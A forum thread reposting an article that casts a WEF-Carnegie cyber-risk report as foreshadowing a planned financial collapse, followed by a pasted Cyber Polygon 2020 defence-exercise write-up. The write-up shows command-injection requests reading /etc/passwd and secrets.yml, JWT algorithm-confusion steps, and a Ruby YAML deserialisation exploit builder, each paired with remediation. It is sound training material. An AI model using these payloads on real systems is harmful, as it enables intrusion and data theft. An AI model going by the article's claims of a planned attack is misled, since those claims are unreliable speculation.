
Thread: WEF planning cyber attack on financial system?

    Post #1 by TomKat (Avalon Member, Canada)

    WEF planning cyber attack on financial system?

    Like covid, they are announcing it ahead of time:

    https://www.activistpost.com/2021/04...al-system.html

    Better have some physical cash on hand.

    Admin editorial: this is a Whitney Webb article; she's amongst the very best independent researchers and journalists we have and her work here deserves to be placed right up-front. This isn't new news of course - it's been covered on the forum elsewhere, and discussed - Tintin.

    WEF Warns of Cyber Attack Leading to Systemic Collapse of the Global Financial System

    APRIL 7, 2021
    By Whitney Webb



    A report published last year by the WEF-Carnegie Cyber Policy Initiative calls for the merging of Wall Street banks, their regulators and intelligence agencies as necessary to confront an allegedly imminent cyber attack that will collapse the existing financial system.

    In November 2020, the World Economic Forum (WEF) and Carnegie Endowment for International Peace co-produced a report that warned that the global financial system was increasingly vulnerable to cyber attacks. Advisors to the group that produced the report included representatives from the Federal Reserve, the Bank of England, the International Monetary Fund, Wall Street giants like JP Morgan Chase and Silicon Valley behemoths like Amazon.

    The ominous report was published just months after the World Economic Forum had conducted a simulation of that very event – a cyber attack that brings the global financial system to its knees – in partnership with Russia’s largest bank, which is due to jumpstart that country’s economic “digital transformation” with the launch of its own central bank-backed digital currency.

    More recently, last Tuesday, the largest information sharing organization of the financial industry, whose known members include Bank of America, Wells Fargo and CitiGroup, has again warned that nation-state hackers and cybercriminals were poised to work together to attack the global financial system in the short term. The CEO of this organization, known as the Financial Services Information Sharing and Analysis Center (FS-ISAC), had previously advised the WEF-Carnegie report that had warned much the same.

    Such coordinated simulations and warnings from those who dominate the current, ailing financial system are obvious cause for concern, particularly given that the World Economic Forum is well known for its Event 201 simulation about a global coronavirus pandemic that took place just months prior to the COVID-19 crisis.

    The COVID-19 crisis has since been cited as the main justification for accelerating the “digital transformation” of the financial and other sectors that the Forum and its partners have promoted for years. Their latest prediction of a doomsday event, a cyber attack that stops the current financial system in its tracks and instigates its systemic collapse, would offer the final yet necessary step for the Forum’s desired outcome of this widespread shift to digital currency and increased global governance of the international economy.

    Given that experts have been warning since the last global financial crisis that the collapse of the entire system was inevitable due to central bank mismanagement and rampant Wall Street corruption, a cyber attack would also provide the perfect scenario for dismantling the current, failing system as it would absolve central banks and corrupt financial institutions of any responsibility. It would also provide a justification for incredibly troubling policies promoted by the WEF-Carnegie report, such as a greater fusion of intelligence agencies and banks in order to better “protect” critical financial infrastructure.

    Considering the precedent of the WEF’s past simulations and reports with the COVID-19 crisis, it is well worth examining the simulations, warnings and the policies promoted by these powerful organizations. The remainder of this article will examine the WEF-Carnegie report from November 2020, while a follow-up report will focus on the more recent FS-ISAC report published last week. The WEF simulation of a cyber attack on the global financial system, Cyber Polygon 2020, was covered in detail by Unlimited Hangout in a previous report.

    The WEF-Carnegie Cyber Policy Initiative

    The Carnegie Endowment for International Peace is one of the most influential foreign policy think tanks in the United States, with close and persistent ties to the US State Department, former Presidents, corporate America and American oligarch clans like the Pritzkers of Hyatt hotels. Current trustees of the endowment include executives from Bank of America and CitiGroup as well as other influential financial institutions.

    In 2019, the same year as Event 201, the Endowment launched its Cyber Policy Initiative with the goal of producing an “International Strategy for Cybersecurity and the Global Financial System 2021-2024.” That strategy was released just months ago, in November 2020 and, according to the Endowment, was authored by “leading experts in governments, central banks, industry and the technical community” in order to provide a “longer-term international cybersecurity strategy” specifically for the financial system.

    The initiative is an outgrowth of past efforts of the Carnegie Endowment to promote the fusion of financial authorities, the financial industry, law enforcement and national security agencies, which is both a major recommendation of the November 2020 report and a conclusion of a 2019 “high-level roundtable” between the Endowment, the IMF and central bank governors. The Endowment had also partnered with the IMF, SWIFT, Standard Chartered and FS-ISAC to create a “cyber resilience capacity-building tool box” for financial institutions in 2019. That same year, the Endowment also began tracking “the evolution of the cyber threat landscape and incidents involving financial institutions” in collaboration with BAE Systems, the UK’s largest weapons manufacturer. Per the Endowment, this collaboration continues into the present.

    In January 2020, representatives of the Carnegie Endowment presented their Cyber Policy Initiative at the annual meeting of the World Economic Forum, after which the Forum officially partnered with the Endowment on the initiative.

    Advisors to the now joint WEF-Carnegie project include representatives of central banks like the US Federal Reserve and the European Central Bank; some of Wall Street’s most infamous banks like Bank of America and JP Morgan Chase; law enforcement organizations such as INTERPOL and the US Secret Service; corporate giants like Amazon and Accenture; and global financial institutions like the International Monetary Fund (IMF) and SWIFT. Other notable advisors include the managing director and head of the WEF’s Centre for Cybersecurity, Jeremy Jurgens, who was also a key player in the Cyber Polygon simulation, and Steve Silberstein, the CEO of the Financial Services Information Sharing and Analysis Center (FS-ISAC).

    “Not a Question of If but When”

    The Cyber Policy Initiative’s November 2020 report is officially titled “International Strategy to Better Protect the Financial System.” It begins by noting that the global financial system, like many other systems, is “going through unprecedented digital transformation, which is being accelerated by the coronavirus pandemic.”

    It then warns that:
    “Malicious actors are taking advantage of this digital transformation and pose a growing threat to the global financial system, financial stability, and confidence in the integrity of the financial system. Malign actors are using cyber capabilities to steal from, disrupt, or otherwise threaten financial institutions, investors and the public. These actors include not only increasingly daring criminals, but also states and state-sponsored attackers.”
    Followed by this warning of “malign actors”, the report notes that “increasingly concerned, key voices are sounding the alarm.” It notes that Christine Lagarde of the European Central Bank and formerly of the IMF warned in February 2020 that “a cyber attack could trigger a serious financial crisis.” A year prior, at the WEF’s annual meeting, the head of Japan’s central bank predicted that “cybersecurity could become the financial system’s most serious risk in the near future.” It also notes that in 2019, Jamie Dimon of JP Morgan Chase similarly labeled cyber attacks as possibly “the biggest threat to the US financial system.”

    Not long after Lagarde’s warning, in April 2020, the Financial Stability Board asserted that “cyber incidents pose a threat to the stability of the global financial system” and that “a major cyber incident, if not properly contained, could seriously disrupt financial systems, including critical financial infrastructure, leading to broader financial stability implications.”

    The WEF-Carnegie report authors add to these concerns that “the exploitation of cyber vulnerabilities could cause losses to investors and the general public” and lead to significant damage to public trust and confidence in the current financial system. It also notes, aside from affecting the general public in a significant way, this threat would impact both high-income countries and low to lower-middle income countries, meaning its impact on the masses will be global in scope.

    The report then ominously concludes that “one thing is clear: it is not a question of if a major incident will happen, but when.”

    Ensuring control of the narrative

    Another section of the report details recommendations for controlling the narrative in the event such a crippling cyber attack takes place. The report specifically recommends that “financial authorities and industry should ensure they are properly prepared for influence operations and hybrid attacks that combine influence operations with malicious hacking activity” and that they “apply lessons learned from influence operations targeting electoral processes to potential attacks on financial institutions.”

    It goes on to recommend that “major financial services firms, central banks and other financial supervisory authorities”, representatives of which advised the WEF-Carnegie report, “identify a single point of contact within each organisation to engage social media platforms for crisis management.”

    The report’s authors argue that, “in the event of a crisis,” such as a devastating cyber attack on the global banking system, “social media companies should swiftly amplify communications by central banks” so that central banks may “debunk fake information” and “calm the markets.” It also states that “financial authorities, financial services firms and tech companies [presumably including social media companies] should develop a clear communications and response plan focused on being able to react swiftly.” Notably, both Facebook and Twitter are listed in the report’s appendix as “industry stakeholders” that have “engaged” with the WEF-Carnegie initiative.

    The report also asserts that premeditated coordination for such a crisis between banks and social media companies needs to take place so that both parties may “determine what severity of crisis would necessitate amplified communication.” The report also calls for social media companies to work with central banks to “develop escalation paths similar to those developed in the wake of the past election interference, as seen in the United States and Europe.”

    Of course, those “escalation paths” involved wide-ranging social media censorship. The report seems to acknowledge this, when it adds that “quick coordination with social media platforms is necessary to organise content takedowns.” Thus, the report is calling for central banks to collude with social media platforms to plan out censorship efforts that would be enacted if a sufficiently severe crisis occurs in financial markets.

    As far as “influence operations” go, the report divides these into two categories; those that target individual firms and those that target markets overall. Regarding the first category, the report states that “organised actors will spread fraudulent rumours to manipulate stock prices and generate profit based on how much the price of the stock was artificially moved.” It then adds that, in these influence operations, “firms and lobbyists use astroturfing campaigns, which create a false appearance of grassroots support, to tarnish the value of a competing brand or attempt to sway policymaking decisions by abusing calls for online public comments.” The similarities between this latter statement and the Wall Street Bets phenomenon of January 2021 are obvious.

    Regarding the second category of “influence operations,” the report defines these operations as “likely to be carried out by a politically motivated actor like a terrorist group or even a nation-state.” It adds that “this type of influence operation may directly target the financial system to manipulate markets, for example, by spreading rumours about market-moving decisions by central banks” as well as spreading “false information that does not directly reference financial markets but that causes financial markets to react.”

    Given that the report states that the first category of influence operation poses little systemic risk while the second “may pose systemic risk”, it seems more likely that the event being predicted by the WEF-Carnegie report would involve claims of the latter by a “terrorist group” or potentially a nation-state. Notably, the report mentions North Korea as a likely nation-state offender on several occasions. It also dwells on the likelihood that synthetic media or “deep fakes” would be part of this system-devastating event in emerging economies and/or in high-income countries experiencing a financial crisis.

    A separate June 2020 report from the WEF-Carnegie initiative was published specifically on deepfakes and the financial system, noting that such attacks would likely transpire during a larger financial crisis to “amplify” damaging narratives or “simulate grassroots consumer backlash against a targeted brand.” It adds that “companies, financial institutions and government regulators facing public relations crises are especially vulnerable to deepfakes and synthetic media.”

    In light of these statements, it is worth pointing out that bad actors within the current system could exploit these scenarios and theories to paint actual grassroots backlash against a bank or corporation as being a synthetic “influence operation” perpetrated by “cybercriminals” or a nation-state. Considering that the WEF-Carnegie report references a scenario analogous to the Wall Street Bets situation in January 2021, a banker-led effort to falsely label a future grassroots backlash as instead being synthetic and the fault of a “terrorist group” or nation-state should not be ruled out.

    “Reducing Fragmentation”: Merging Banks with their Regulators and Intelligence Agencies

    Given the inevitability of this destructive event predicted by the report’s authors, it is important to focus in on the solutions proposed in the WEF-Carnegie report as they will become immediately relevant if this event, as predicted by the WEF and Carnegie Endowment, does come to pass.

    Some of the solutions proposed are to be expected from a WEF-linked policy document, such as the calls for increased public-private partnerships and greater coordination among regional and international organizations as well as increased coordination between national governments.

    However, the main “solution” at the heart of this report, and also at the heart of the WEF-Carnegie initiative’s other endeavors, is a call to fuse corporate banks, the financial authorities that essentially oversee them, tech companies and the national security state.

    The report’s authors first argue that the main vulnerability of the global financial system at present is “the current fragmentation among stakeholders and initiatives” and that mitigating this threat to the global system lies in reducing that “fragmentation.” The report argues that resolving the issue requires a massive re-organization of all “stakeholders” via increased global coordination. The report notes that the “disconnect between the finance, the national security and the diplomatic communities is particularly pronounced” and calls for much closer interaction between the three.

    It then states that:

    “This requires countries not only to better organize themselves domestically but also to strengthen international cooperation to defend against, investigate, prosecute and ideally prevent future attacks. This implies that the financial sector and financial authorities must regularly interact with law enforcement and other national security agencies in unprecedented ways, both domestically and internationally.”


    Some examples of these “unprecedented interactions” between banks and the national security state are included in the report’s recommendations. For instance, it argues that “governments should use the unique capabilities of their national security communities to help protect FMIs [financial market infrastructures] and critical trading systems.” It also calls for “national security agencies [to] consult critical cloud service providers [like WEF-Carnegie initiative partner Amazon Web Services] to determine how intelligence collection could be used to help identify and monitor potential significant threat actors and develop a mechanism to share information about imminent threats” with tech companies.

    The report also states that “the financial industry should throw its weight behind efforts to tackle cyber crime more effectively, for example by increasing its participation in law enforcement efforts.”

    On that last point, there are indications this has already begun. For instance, Bank of America, the second largest bank in the US and part of the WEF-Carnegie Initiative and FS-ISAC, was reported to have “actively but secretly engaged” with US law enforcement agencies in the hunt for “political extremists” following the January 6th events at Capitol Hill. In doing so, Bank of America shared private information with the federal government without the knowledge or consent of its customers, leading critics to accuse the bank of “effectively acting as an intelligence agency.”

    Yet, arguably the most troubling part of the report is its call to unite the national security apparatus and the finance industry first, and then use that as a model to do the same with other sectors of the economy. It states that “protecting the international financial system can be a model for other sectors,” adding that “focusing on the financial sector provides a starting point and could pave the way to better protect other sectors in the future.”

    Were all the sectors of the economy to also fuse with the national security state, it would inevitably create a reality where there is no part of daily human life that is not ultimately controlled by these two already very powerful entities. This is a clear recipe for techno-fascism on a global scale. As this WEF-Carnegie report makes clear, the roadmap regarding how to cook up such a nightmare has already been charted out in coordination with the very institutions, banks and governments that currently control the global financial system.

    Not only that, but – as pointed out in Unlimited Hangout’s article on Cyber Polygon – the World Economic Forum and many of its partners have a vested interest in the systemic collapse of the current financial system. In addition, many central banks have recently backed new digital currency systems that can only achieve rapid, mass adoption if the existing system collapses.

    Given that these systems are set to be integrated with biometric IDs and so-called “vaccine passports” through the WEF and Big Tech-backed Vaccine Credential initiative, it is worth considering the timing of the expected launch of such systems in determining when this predicted and allegedly inevitable event is likely to occur.

    With this new financial system so deeply inter-connected to these “credential” efforts, this cyber attack on the financial sector would likely take place at a time when it would best facilitate the adoption of the new economic system and its integration into credential systems currently being promoted as a “way out” of COVID-19-related restrictions.

    Source: The Last American Vagabond

    ---------------------

    Whitney Webb is a staff writer for The Last American Vagabond. She has previously written for Mintpress News, Ben Swann’s Truth In Media. Her work has appeared on Global Research, the Ron Paul Institute and 21st Century Wire, among others. She currently lives with her family in southern Chile.

    https://www.thelastamericanvagabond..../whitney-webb/

    _______________

    Carnegie report: International Strategy to Better Protect the Financial System Against Cyber Attacks - Maurer + Nelson (document runs to 242 pages and is too large to embed here)
    Last edited by Tintin; 8th April 2021 at 09:54.


    Post #2 by Tintin (Moderator/Librarian/Administrator, Trowbridge/Bath - UK)

    "Cyber Polygon" Simulation Exercise - July 2020

    We of course all know where these 'simulation' exercises lead.

    Forgive the inclusion here of the coding from their site, but the super-smart of you out there who understand code well may find something of interest there. It's a direct copy/paste from their site and I think may prove interesting.

    And we don't give the geekier ones of you anywhere near enough to possibly feed on. Do note that the appearance of emojis part way through some of the code is a result obviously of eg colon + p being used in the code.

    ---------------------------------------------------------

    Overview from website:
    Cyber Polygon 2020
    In 2020, the live stream gathered 5 million spectators from 57 nations. The event featured the world’s leaders and renowned experts, including Mikhail Mishustin, Prime Minister of the Russian Federation, Klaus Schwab, Founder and Executive Chairman, World Economic Forum, top officials from INTERPOL, ICANN, Visa, IBM, Sber, MTS and other organisations.

    The technical exercise attracted 120 of the largest enterprises from 29 countries. These included financial, healthcare and educational institutions, state and law enforcement agencies, energy suppliers, companies from IT, metal, telecom, chemical, aerospace engineering and other sectors.
    -----------------------

    Defence Scenario: Cyber Polygon 2020 Technical Exercise Write-up - https://2020.cyberpolygon.com/materi...-polygon-2020/

    On 8 July 2020, Cyber Polygon — an international online cybersecurity training — took place for the second time. The technical exercise was attended by 120 teams from some of the largest Russian and international organisations across 29 countries. Among the participants were: banks, telecom providers, energy suppliers, medical institutions, universities as well as government and law enforcement agencies.

    The participants acting as Blue Teams had to defend their segments of the training infrastructure. The organisers (BI.ZONE) acted as the Red Team and simulated the cyberattacks.

    The exercise included two scenarios: Defence and Response.

    This article goes into details of the Defence scenario, where the participants had to repel an attack conducted by the Red Team, and covers the following topics:

    - basic game mechanics
    - infrastructure and game service provided to the participants
    - vulnerabilities embedded in the services
    - exploitation scenarios and attack detection methods
    - vulnerability remediation methods

    Legend
    According to the legend, the organisation’s virtual infrastructure included a service which processed confidential client information. This service became the subject of interest to an APT group. Cybercriminals were going to steal confidential user data and then resell it on the Darknet in order to receive a financial benefit and cause damage to company reputation.

    The APT group studied the target system in advance and discovered several critical vulnerabilities. The gang launched the attack on the day of the exercise.

    The Blue Teams had to:

    - contain the attack as fast as possible
    - minimise the amount of information stolen
    - maintain the service availability

    The participants could apply any available and familiar methods and tools to protect the infrastructure.

    Core Mechanics
    The team members who had participated in Attack-Defence CTF may have noticed some similarities between this format of cybersecurity competition and the scenario being described. However, during the Cyber Polygon training, the participants were not expected to attack each other — all they had to do was protect their own services.

    This rule was introduced to ensure that all the participants were on an equal playing field and could focus on improving their defensive skills. Besides, it enabled a more objective assessment of the teams’ skills due to more accurate quantitative metrics.

    The following indicators were used as metrics:

    Health Points (HP). A simple numerical value. Every time when the Red Team successfully exploited a vulnerability in the Blue Team’s services and captured the flag, the Blue Team lost HP. The more vulnerabilities the Red Team was able to exploit, the more HP the team lost. HP was deducted once per round.

    Service Level Agreement (SLA). In the context of this scenario, SLA indicated the integrity and accessibility of a service. It was measured as a percentage (0–100%). The defending team lost SLA points if the service was made unavailable or malfunctioned at the moment the checker contacted it. The checker could access any service several times per round, but each team’s services were checked an equal number of times. The resulting SLA was calculated as the percentage of successful checks (when the service was available and fully functional) to the total number of checks.

    The checker is the mechanism that allowed the organisers to verify whether the teams’ services were fully functional. Since the game service simulated a real web application, the checker was also used to ensure compliance with the rules of the game: the participants could not simply turn off the service or disable some of its features; all they could do was defend their segments against Red Team attacks.

    The final score for the scenarios was calculated as SLA * HP.

    The participants were given 30 minutes for preparation, i.e. they were supposed to familiarise themselves with the service provided, roll out monitoring and defensive tools and start searching for vulnerabilities in the service code.

    After those 30 minutes, the so-called ‘active phase’ of the scenario began: the Red Team started its attack. The active phase consisted of 18 rounds, 5 minutes each.

    Before the start of the scenario, each team received 180 HP for each of the 5 vulnerabilities embedded in the service (900 HP in total). The team lost 10 HP for each vulnerability exploited. Thus, if the team had 3 vulnerabilities exploited during a round, it lost a total of 30 HP in this round, and if 5 vulnerabilities were exploited — 50 HP respectively.

    Apart from controlling the availability of the teams’ services, the checker was used to deliver the so-called flag to the teams’ services at the beginning of each round (using legitimate service functions). A flag is a string of the form ‘Polygon{JWT}’, where JWT stands for JSON Web Token.

    In this scenario, the flag represented confidential data: the more flags the Red Team was able to steal, the more data was leaked. A stolen flag also meant the exploitation of a vulnerability: the team lost HP once the Red Team took advantage of a vulnerability and grabbed the flag.


    Infrastructure and Game Service
    Each participating team was provided with a virtual server running the Linux operating system.

    After connecting via VPN, the participants got access to their server through SSH. The teams were granted full (root) access to their system.

    The participants’ game service was available from the user’s home directory /home/cyberpolygon/ch4ng3org.

    The game service backend was written in Ruby, while the frontend used the React JS framework. The database was managed by the PostgreSQL DBMS.

    The service was designed to be rolled out on Docker, which was evident from its directory: for instance, it contained such files as Dockerfile and docker-compose.yml.

    The participants had full access to the service’s source codes, configuration files and the database, and could use this information to search for and fix vulnerabilities in the service.


    Vulnerabilities
    Insecure Direct Object References

    The vulnerability referred to as insecure direct object reference (IDOR) is caused by flaws in authorisation mechanisms. The vulnerability allows an attacker to gain access to otherwise inaccessible user data.

    This vulnerability was present in the game service under the get method of the UsersController class.

    backend/app/controllers/users_controller.rb:

      def get
        user = User.find(params[:id])
        if params[:full].present?
          json_response({
            id: user.id,
            name: user.name,
            email: user.email,
            phone: user.phone
          })
        else
          json_response({
            id: user.id,
            name: user.name
          })
        end
      end

    When calling the address http://example.com/api/users/<USER_ID>, where USER_ID is a numeric user identifier, any user could get a JSON object containing a numeric identifier and a username corresponding to that numeric identifier.

    This functionality as such does not pose any threat to user data. You should rather focus on the following code snippet:

      if params[:full].present?
        json_response({
          id: user.id,
          name: user.name,
          email: user.email,
          phone: user.phone
        })

    Note that if the full parameter is transmitted in a request, the server response will return more data: in addition to the user ID and username, it will contain their email and phone number.

    The flags were stored in and could be stolen from the user.phone field in the game service’s directory (this activity could be detected, for example, by analysing the network traffic). Each round, the checker created several users and saved the flag as one of such users’ phone number.

    In order to take advantage of this weakness, the Red Team sent requests like http://example.com/api/users/<USER_ID>?full=1 to the service and searched for the flag in the phone field of the output JSON objects.

    To protect against this vulnerability, it would be good practice to obscure sensitive data when displaying it to the user. Thus, the phone number +71112223344 can be shown as +7111*****44.

    For example:
    def get
      user = User.find(params[:id])
      if params[:full].present?
        # Masking user's phone number: keep the first 5 and the last 2 characters,
        # replace everything in between with the same number of asterisks
        # (dup so the model attribute itself is not modified in place)
        uphone = user.phone.dup
        x = 5
        y = uphone.length - 3
        replacement = '*' * (y - x + 1)
        uphone[x..y] = replacement

        json_response({
          id: user.id,
          name: user.name,
          email: user.email,
          phone: uphone
        })
      else
        json_response({
          id: user.id,
          name: user.name
        })
      end
    end
    In this case, the Red Team would have got a string like Polyg********X} instead of the full flag value, and the participating team could have avoided losing HP due to this vulnerability being exploited.


    Command Injection
    Command injection is the result of inadequate filtering of user data. This vulnerability enables an attacker to inject OS commands that are executed on the target system with the privileges of the vulnerable application.

    In the game service, the vulnerability was present in the disk_stats method of the StatsController class.

    backend/app/controllers/stats_controller.rb:

    def disk_stats
      if params[:flags].present?
        flags = params[:flags]
      else
        flags = ''
      end

      json_response({
        disk: `df #{flags}`
      })
    end

    When calling the address http://example.com/api/disk_stats, the service responds with the output of the system df utility in the disk field of the JSON object, which allows one to evaluate the amount of free space in the file system.

    The command being called was designed to transmit various parameters, but their value is not filtered out:

    if params[:flags].present?
      flags = params[:flags]

    json_response({
      disk: `df #{flags}`
    })
    This means that a potential attacker can execute virtually any command in the system using special command-line syntax.

    For example, by running a request http://example.com/api/disk_stats?flags=;cat /etc/passwd a threat actor will be able to read the contents of system file /etc/passwd.

    This is how the Red Team exploited this weakness:

    By sending a request http://example.com/api/disk_stats?flags=>dev/null;cat config/secrets.yml, the attackers obtained the contents of the backend/config/secrets.yml file, which stored the private key for signing JWT tokens.

    Having obtained the private key, the Red Team could generate and sign a JWT token valid for any user. Given that the Red Team used the current private key of the service, this token would have been successfully validated and accepted by the application.

    By sending a request http://example.com/api/me on behalf of the user for whom the token was generated, the Red Team obtained the user’s phone number and checked it for a flag.

    To protect against this vulnerability, a sufficient measure was to prohibit any parameters from being injected in the command call, as the overall system performance is not tied to this endpoint being used:

    def disk_stats
      json_response({
        disk: `df`
      })
    end

    Security Misconfiguration
    The vulnerability known as security misconfiguration is usually caused by a human factor. Standard application configurations are often not specifically geared towards security. Due to the lack of proactivity, attention or competence of responsible staff, these configurations sometimes remain unadapted to harsh realities, which comes with significant security implications.

    The game service had this vulnerability embedded in the db service description, in the docker-compose.yml file.
    docker-compose.yml:


    db:
      image: postgres
      restart: always
      network_mode: bridge
      volumes:
        - ./db_data:/var/lib/postgresql/data
      ports:
        - 5432:5432
      environment:
        POSTGRES_DB: ch4ng3
        POSTGRES_USER: ch4ng3
        POSTGRES_PASSWORD: ch4ng3
    As you can see, the network port of the database is available from the external network:

    ports:
      - 5432:5432
    Besides, the database server uses one and the same string as the database name, username and password, which also matches the service ch4ng3.org.

    Having detected the database port as a result of network scanning, the Red Team was able to brute-force the login and password to the database. It then executed the SQL statement below, which returned all user phone numbers with flags inside:


    SELECT phone FROM users WHERE phone LIKE 'Polygon%'
    To protect against this vulnerability, the ideal solution would have been to prohibit the database from being connected externally and to change the database user password (with the api service reconfigured accordingly):

    db:
      image: postgres
      restart: always
      network_mode: bridge
      volumes:
        - ./db_data:/var/lib/postgresql/data
      environment:
        POSTGRES_DB: ch4ng3
        POSTGRES_USER: ch4ng3
        POSTGRES_PASSWORD: <VERY_SECRET_PASSWORD>

      environment:
        - DATABASE_URL=postgres://ch4ng3:<VERY_SECRET_PASSWORD>@db:5432/ch4ng3?sslmode=disable
    However, one of the two actions would have sufficed: either changing the database user password to a stronger one or prohibiting database connections from the external network.


    JWT Signature Algorithm Change
    The next vulnerability buried in the game service related to JWT signature algorithm change.

    It was present in the decode method of the JsonWebToken class.

    backend/app/lib/json_web_token.rb:

    def self.decode(token, algorithm)
      # cannot store key as ruby object in yaml file
      public_key = Rails.application.secrets.public_key_base
      if algorithm == 'RS256'
        public_key = OpenSSL::PKey::RSA.new(public_key)
      end
      # get payload; first index in decoded array
      body = JWT.decode(token, public_key, true, {:algorithm => algorithm})[0]
      HashWithIndifferentAccess.new body
    # rescue from expiry exception
    rescue JWT::ExpiredSignature, JWT::VerificationError => e
      # raise custom error to be handled by custom handler
      raise ExceptionHandler::InvalidToken, e.message
    end
    The following lines deserve a closer look:

    public_key = Rails.application.secrets.public_key_base
    if algorithm == 'RS256'
      public_key = OpenSSL::PKey::RSA.new(public_key)
    end
    # get payload; first index in decoded array
    body = JWT.decode(token, public_key, true, {:algorithm => algorithm})[0]
    The application loads the string containing the service public key from the configuration file and, where the RS256 algorithm has been transmitted in the token, converts that string into an RSA public key, which is then used to verify the token signature.

    Note that if any other value is transmitted in the algorithm parameter, the public key string will not be converted. If the value HS256 is sent in the alg JWT field, the symmetric HMAC algorithm will be used for signature verification, and exactly this public key string will be used as the key to verify the token signature.

    This is how this weakness was exploited by the Red Team:

    By sending a request http://example.com/api/auth/third_party, the attackers received the service public key from the public_key field of the output JSON object.
    Having obtained the public key, the Red Team could generate a valid JWT token for any user by sending the HS256 value in the alg JWT field and signing the token with the service public key string used as the secret for the HMAC algorithm.
    By sending a request http://example.com/api/me on behalf of the user for whom the token was generated, the Red Team obtained the user’s phone number and checked it for a flag.

    To protect against this vulnerability, the following recommendation could have helped: when working with JWT, you had better use only one signature algorithm at a time — either symmetric or asymmetric. Thus, the easiest fix would be:

    backend/app/lib/json_web_token.rb:


    def self.decode(token, algorithm)
      # cannot store key as ruby object in yaml file
      public_key = Rails.application.secrets.public_key_base
      if algorithm == 'RS256'
        public_key = OpenSSL::PKey::RSA.new(public_key)
      else
        raise ExceptionHandler::InvalidToken, Message.invalid_token
      end
      # get payload; first index in decoded array
      body = JWT.decode(token, public_key, true, {:algorithm => algorithm})[0]
      HashWithIndifferentAccess.new body
    # rescue from expiry exception
    rescue JWT::ExpiredSignature, JWT::VerificationError => e
      # raise custom error to be handled by custom handler
      raise ExceptionHandler::InvalidToken, e.message
    end


    Now, if you send a value other than RS256 to the token’s alg field, the token will be marked as invalid and the Red Team will not be able to access the application on behalf of other users by signing tokens with the service public key.


    YAML Insecure Deserialisation
    The last vulnerability embedded in the game service was associated with YAML insecure deserialisation.

    The import method of the PetitionsController class was responsible for importing petitions through their YAML-format description.

    backend/app/controllers/petitions_controller.rb:

    def import
      yaml = Base64.decode64(params[:petition])
      begin
        petition = YAML.load(yaml)
      rescue Psych::SyntaxError => e
        json_response({message: e.message}, 500)
        return
      rescue => e
        json_response({message: e.message, trace: ([e.message]+e.backtrace).join($/)}, 500)
        return
      end
      if petition['created_at']
        petition = current_user.petitions.create!(text: petition['text'], title: petition['title'], created_at: petition['created_at'])
      else
        petition = current_user.petitions.create!(text: petition['text'], title: petition['title'])
      end
      petition.signs.create!(petition_id: petition.id, user_id: current_user.id)
      json_response(petition)
    end
    Particular attention should have been given to the following code lines:


    yaml = Base64.decode64(params[:petition])
    begin
      petition = YAML.load(yaml)
    rescue Psych::SyntaxError => e
      json_response({message: e.message}, 500)
      return
    As you may have noticed, the contents of a YAML object are taken from the base64-encoded petition parameter and then converted into Ruby objects using the YAML.load(yaml) call.

    This call is insecure and allows, among other things, arbitrary Ruby code execution on the target system within the vulnerable application, which is what the Red Team did.

    The following script was used to generate a YAML object to take advantage of this weakness:


    require "erb"
    require "base64"
    require "active_support"

    if ARGV.empty?
      puts "Usage: exploit_builder.rb <source_file>"
      exit!
    end

    erb = ERB.allocate
    erb.instance_variable_set :@src, File.read(ARGV.first)
    erb.instance_variable_set :@lineno, 1

    depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result

    payload = Base64.encode64(Marshal.dump(depr))

    puts <<-PAYLOAD
    ---
    !ruby/object:Gem::Requirement
    requirements:
      - !ruby/object:Rack::Session::Abstract::SessionHash
        req: !ruby/object:Rack::Request
          env:
            rack.session: !ruby/object:Rack::Session::Abstract::SessionHash
              loaded: true
            HTTP_COOKIE: "a=#{payload}"
        store: !ruby/object:Rack::Session::Cookie
          coder: !ruby/object:Rack::Session::Cookie::Base64::Marshal {}
          key: a
          secrets: []
        exists: true

    PAYLOAD
    The following code was applied as the payload:

    phones = ''
    User.all().each do |user|
      phones += user.phone + ';'
    end
    raise phones
    The code received the phone numbers of all users registered with the service, joined them with ';' and used raise to cause an exception, sending the string with the users’ phone numbers as an error message.

    The error message was then returned by the server to the JSON object message field together with the response code 500. Once the Red Team received this response, all it had to do was locate the flag in the error message.

    To protect against this vulnerability, it was sufficient to replace the call of the YAML.load(yaml) function with the call of the YAML.safe_load(yaml) function. However, during the availability check, the checker verified that the transmitted YAML object allowed for aliases to be applied. Hence, the resulting call is as follows: YAML.safe_load(yaml, aliases: true).

    And the resulting secure function accordingly:

    def import
      yaml = Base64.decode64(params[:petition])
      begin
        petition = YAML.safe_load(yaml, aliases: true)
      rescue Psych::SyntaxError => e
        json_response({message: e.message}, 500)
        return
      rescue => e
        json_response({message: e.message, trace: ([e.message]+e.backtrace).join($/)}, 500)
        return
      end
      if petition['created_at']
        petition = current_user.petitions.create!(text: petition['text'], title: petition['title'], created_at: petition['created_at'])
      else
        petition = current_user.petitions.create!(text: petition['text'], title: petition['title'])
      end
      petition.signs.create!(petition_id: petition.id, user_id: current_user.id)
      json_response(petition)
    end
    Conclusion
    In our article, we explored the vulnerabilities implanted in Cyber Polygon’s Defence scenario game service, analysed the applied exploitation scenarios and gave examples of remediation that would have allowed the participants to protect their services against the Red Team.

    We would use the patch methods from the examples in a real-life situation. However, you should keep in mind that these are not the only possible effective methods.

    The scenario assumed that the participants would be able to defend themselves without having to patch the code in their game services. For example, to protect against the third vulnerability — security misconfiguration, which is associated with an insecure Docker configuration, it was sufficient to block the database port on the firewall.

    However, we believe that the best solution is to remediate the flaws in services and applications rather than resorting to ’palliative’ measures, which sooner or later may not be sufficient to withstand an attack. This is why we examined in detail the source code corrections as a means to protect against vulnerabilities.

    We hope that you have found the exercise useful and insightful, and look forward to seeing you at the next Cyber Polygon events.
    “If a man does not keep pace with [fall into line with] his companions, perhaps it is because he hears a different drummer. Let him step to the music which he hears, however measured or far away.” - Thoreau

  4. The Following 11 Users Say Thank You to Tintin For This Post:

    Ba-ba-Ra (8th April 2021), Bill Ryan (11th April 2021), gord (8th April 2021), Harmony (8th April 2021), mountain_jim (8th April 2021), O Donna (10th April 2021), palehorse (8th April 2021), Snoweagle (8th April 2021), TomKat (8th April 2021), toppy (8th April 2021), Yoda (8th April 2021)
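    Editor's added example for the JWT signature algorithm change section of the article above. This is not code from the article or from the Cyber Polygon game service (which used the jwt gem and Rails secrets); it is a stand-alone illustration of the recommended fix, using only the Ruby standard library. The module name PinnedJwt, its helper names and the InvalidToken error class are assumptions. It goes a little beyond the article's patch: the algorithm is pinned in the verifier itself rather than taken from the request, so a header claiming HS256 or none is refused before any signature check, and an exp claim is honoured.

```ruby
require 'base64'
require 'json'
require 'openssl'

# Added example, not the game service's code: a JWT decode routine that pins the
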